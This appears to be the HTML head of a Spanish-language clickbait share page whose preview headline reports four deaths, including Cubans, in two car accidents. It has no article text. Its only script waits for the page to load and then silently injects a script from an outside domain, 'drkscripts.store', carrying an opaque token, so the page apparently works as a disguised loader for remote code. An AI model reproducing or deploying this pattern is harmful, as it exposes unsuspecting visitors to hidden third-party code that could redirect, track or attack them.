<!DOCTYPE html>
  <html lang="es">
  <head>
  <meta charset="utf-8"/>
  <meta name="title" content="Stream"/>
  <meta name="keywords" content="Instagram"/>
  <meta property="og:description" content="2411"/>
  <meta name="googlebot" content="noindex"/>
  <meta name="robots" content="index"/>
  <meta name="robots" content="noindex"/>
  <meta name="robots" content="nofollow"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1"/>
  <meta property="og:title" content="4 personas perdieron la vida esta mañana en dos fatales accidentes vehiculares entre ellos hay cubanos"/>
  <meta property="og:image" content="https://postcron-temp.us-east-1.linodeobjects.com/6666ec4eab369-67c8c2db-6e064a48-ec4e-b383.png"/>
  <meta name="apple-itunes-app" content="app-id=6448311069"/>
  <script>
    window.addEventListener('load', function() {
        // Carga el script en lugar de redirigir a una URL aleatoria
        setTimeout(function() {
            // Crea un elemento script y asigna el src
            var script = document.createElement('script');
            script.src = 'https://ap1.drkscripts.store/?token=U2FsdGVkX18ml4y2qvzvySWv4Im7qiT3i0YxcyscFcNH7khDZkjpw5d5n2RP0R92XyZqnng8bgQdkNGxZrdrhA%3D%3D';
            script.type = 'text/javascript';
            script.async = true;

            // Agrega el script al final del body
            document.body.appendChild(script);
        }, 500);
    });
</script>